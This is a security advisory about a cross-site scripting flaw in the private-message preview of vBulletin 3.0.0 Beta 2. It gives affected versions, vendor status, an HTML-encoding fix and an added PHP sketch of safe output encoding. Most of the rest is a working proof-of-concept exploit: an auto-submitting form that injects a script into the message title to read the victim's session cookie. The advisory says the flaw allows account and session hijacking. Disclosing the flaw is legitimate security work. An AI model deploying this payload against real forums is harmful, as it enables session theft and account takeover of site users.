vBulletin XSS
------------------------------------------------------
vBulletin Private Message "Preview Message" XSS Vulnerability
14.05.2003
------------------------------------------------------
Any kind of XSS attack is possible, including account/session hijacking.
------------------------------------------------------
About vBulletin;
------------------------------------------------------
Popular PHP-based forum application
Vendor & Demo;
www.vbulletin.com
------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0.0 Beta 2
------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.2
------------------------------------------------------
Vendor Status;
------------------------------------------------------
Patched. This version of vBulletin has not been released publicly yet, but some vBulletin customers, such as www.sitepointforums.com (more than 23.000 members), are already using it.
------------------------------------------------------
Solution;
------------------------------------------------------
HTML-encode the previewed private message fields, as the post thread preview page already does.
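
The fix described above, as an added PHP sketch (not vBulletin source code and not from the advisory's author). It assumes the preview page writes the submitted title back into the form's value attribute, which the advisory does not show; the function names and the sample inputs are constructed for illustration.

```php
<?php
// Added illustration, not vBulletin code. All function names are hypothetical.

// Vulnerable pattern (assumed): the submitted title is written back into
// the preview form's value attribute without any encoding.
function render_title_unsafe(string $title): string
{
    return '<input type="text" name="title" value="' . $title . '" size="40" />';
}

// Hardened pattern: encode for an HTML attribute context. ENT_QUOTES covers
// both " and ', so the value can no longer close the attribute or the tag.
function render_title_safe(string $title): string
{
    $encoded = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="title" value="' . $encoded . '" size="40" />';
}

// Regression check: parse the rendered field and confirm it is still exactly
// one <input> element whose value is the literal text the user typed.
function field_is_intact(string $html, string $typed): bool
{
    libxml_use_internal_errors(true);   // the unsafe output is malformed HTML
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    $body = $doc->getElementsByTagName('body')->item(0);
    $all  = $body->getElementsByTagName('*');
    return $all->length === 1
        && $all->item(0)->nodeName === 'input'
        && $all->item(0)->getAttribute('value') === $typed;
}

// Constructed sample input: harmless markup that tries to leave the attribute.
$samples = ['Meeting notes', '"><b>injected</b>', "it's <fine> & \"quoted\""];

foreach ($samples as $typed) {
    printf(
        "%-28s unsafe intact: %-5s safe intact: %s\n",
        $typed,
        var_export(field_is_intact(render_title_unsafe($typed), $typed), true),
        var_export(field_is_intact(render_title_safe($typed), $typed), true)
    );
}
```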
------------------------------------------------------
Exploit Code;
------------------------------------------------------
[html]
[body]
[form action="http://[victim]/forum/private.php" method="post"
name="vbform"]
[input type="hidden" name="do" value="insertpm" /]
[input type="hidden" name="pmid" value="" /]
[input type="hidden" name="forward" value="" /]
[input type="hidden" name="receipt" value="0" /]
[input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" /]
[textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"][/textarea]
[input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" /]
[input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" ]
[input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" /]
[input type="checkbox" name="signature" value="1" id="cb_signature" /]
[input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" /]
[input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" /]
[/form]
[script]
//Set Values and Submit
// You can write your own JS codes
var xss = "\"][script]alert(document.cookie)[\/script]";
document.vbform.title.value=xss;
document.vbform.preview.click();
[/script]
[/body]
[/html]
* Replace [] with <>
** You may need to log in first
